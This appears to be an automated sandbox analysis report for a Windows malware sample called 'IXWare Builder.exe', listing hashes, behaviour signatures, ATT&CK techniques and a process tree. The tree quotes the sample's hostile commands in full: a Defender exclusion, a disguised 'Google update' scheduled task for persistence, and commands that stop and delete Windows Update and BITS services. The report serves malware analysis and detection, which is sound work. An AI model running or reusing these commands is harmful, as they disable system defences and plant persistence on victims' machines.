05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77

Analysis

max time kernel
99s
max time network
106s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
10-02-2023 23:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IXWare Builder.exe
Size

3.6MB
MD5

6a292b8ab3ff79cefe5f8e42882885d2
SHA1

cd1c59c618cb2f9d906f7214b803dd711f104f27
SHA256

05e1988f56fe199f7e401c8f4d6ee50bb26ab34fb3f96c22de959c7e5f92de77
SHA512

8288878d032221043d3bf99d78011aaab7ee744aeda4c2429cc461d34f7bffd9e091f242ca5fab84a6874e443420f436efc4367f1c776c74e0081f47418e1bab
SSDEEP

49152:NNn9hglTk53CXPgmsyL1dvIcfYNGRaKDFCC2PPGshxSZjUni1h2/MgNRIfxi3vyf:Nd9hCcigVyLPIcRaesSZy9hAx0vyq

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 3036 created 2556	3036	IXWare Builder.exe	40
PID 3036 created 2556	3036	IXWare Builder.exe	40
PID 3036 created 2556	3036	IXWare Builder.exe	40
PID 3036 created 2556	3036	IXWare Builder.exe	40

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	IXWare Builder.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
216	sc.exe
3988	sc.exe
1876	sc.exe
4200	sc.exe
4876	sc.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3036	IXWare Builder.exe
3036	IXWare Builder.exe
4248	powershell.exe
4248	powershell.exe
3036	IXWare Builder.exe
3036	IXWare Builder.exe
3036	IXWare Builder.exe
3036	IXWare Builder.exe
3036	IXWare Builder.exe
3036	IXWare Builder.exe
1296	powershell.exe
1296	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4248	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	3336	powercfg.exe
Token: SeCreatePagefilePrivilege	3336	powercfg.exe
Token: SeShutdownPrivilege	1924	powercfg.exe
Token: SeCreatePagefilePrivilege	1924	powercfg.exe
Token: SeShutdownPrivilege	3544	powercfg.exe
Token: SeCreatePagefilePrivilege	3544	powercfg.exe
Token: SeShutdownPrivilege	940	powercfg.exe
Token: SeCreatePagefilePrivilege	940	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeSystemEnvironmentPrivilege	1296	powershell.exe
Token: SeRemoteShutdownPrivilege	1296	powershell.exe
Token: SeUndockPrivilege	1296	powershell.exe
Token: SeManageVolumePrivilege	1296	powershell.exe
Token: 33	1296	powershell.exe
Token: 34	1296	powershell.exe
Token: 35	1296	powershell.exe
Token: 36	1296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeSystemEnvironmentPrivilege	1296	powershell.exe
Token: SeRemoteShutdownPrivilege	1296	powershell.exe
Token: SeUndockPrivilege	1296	powershell.exe
Token: SeManageVolumePrivilege	1296	powershell.exe
Token: 33	1296	powershell.exe
Token: 34	1296	powershell.exe
Token: 35	1296	powershell.exe
Token: 36	1296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	1296	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 4876	1708	cmd.exe	87
PID 1708 wrote to memory of 4876	1708	cmd.exe	87
PID 1708 wrote to memory of 216	1708	cmd.exe	88
PID 1708 wrote to memory of 216	1708	cmd.exe	88
PID 1708 wrote to memory of 3988	1708	cmd.exe	89
PID 1708 wrote to memory of 3988	1708	cmd.exe	89
PID 1708 wrote to memory of 1876	1708	cmd.exe	90
PID 1708 wrote to memory of 1876	1708	cmd.exe	90
PID 1708 wrote to memory of 4200	1708	cmd.exe	91
PID 1708 wrote to memory of 4200	1708	cmd.exe	91
PID 1708 wrote to memory of 3824	1708	cmd.exe	92
PID 1708 wrote to memory of 3824	1708	cmd.exe	92
PID 1180 wrote to memory of 3336	1180	cmd.exe	93
PID 1180 wrote to memory of 3336	1180	cmd.exe	93
PID 1180 wrote to memory of 1924	1180	cmd.exe	94
PID 1180 wrote to memory of 1924	1180	cmd.exe	94
PID 1708 wrote to memory of 1848	1708	cmd.exe	95
PID 1708 wrote to memory of 1848	1708	cmd.exe	95
PID 1708 wrote to memory of 3692	1708	cmd.exe	96
PID 1708 wrote to memory of 3692	1708	cmd.exe	96
PID 1180 wrote to memory of 3544	1180	cmd.exe	97
PID 1180 wrote to memory of 3544	1180	cmd.exe	97
PID 1708 wrote to memory of 3688	1708	cmd.exe	98
PID 1708 wrote to memory of 3688	1708	cmd.exe	98
PID 1180 wrote to memory of 940	1180	cmd.exe	99
PID 1180 wrote to memory of 940	1180	cmd.exe	99
PID 1708 wrote to memory of 592	1708	cmd.exe	100
PID 1708 wrote to memory of 592	1708	cmd.exe	100

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2556
- C:\Users\Admin\AppData\Local\Temp\IXWare Builder.exe
  "C:\Users\Admin\AppData\Local\Temp\IXWare Builder.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  PID:3036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4248
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1180
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3336
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1924
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3544
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xwrxi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1296
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4876
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:216
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3988
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1876
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4200
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:3824
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1848
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:3692
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:3688
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:592

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
memory/1296-144-0x00007FF905AE0000-0x00007FF9065A1000-memory.dmp

Filesize
10.8MB

Download
memory/1296-153-0x00007FF905AE0000-0x00007FF9065A1000-memory.dmp

Filesize
10.8MB

Download
memory/1296-154-0x00007FF905AE0000-0x00007FF9065A1000-memory.dmp

Filesize
10.8MB

Download
memory/4248-132-0x0000013D76F30000-0x0000013D76F52000-memory.dmp

Filesize
136KB

Download
memory/4248-135-0x00007FF905AE0000-0x00007FF9065A1000-memory.dmp

Filesize
10.8MB

Download
memory/4248-134-0x00007FF905AE0000-0x00007FF9065A1000-memory.dmp

Filesize
10.8MB

Download
memory/4248-133-0x00007FF905AE0000-0x00007FF9065A1000-memory.dmp

Filesize
10.8MB

Download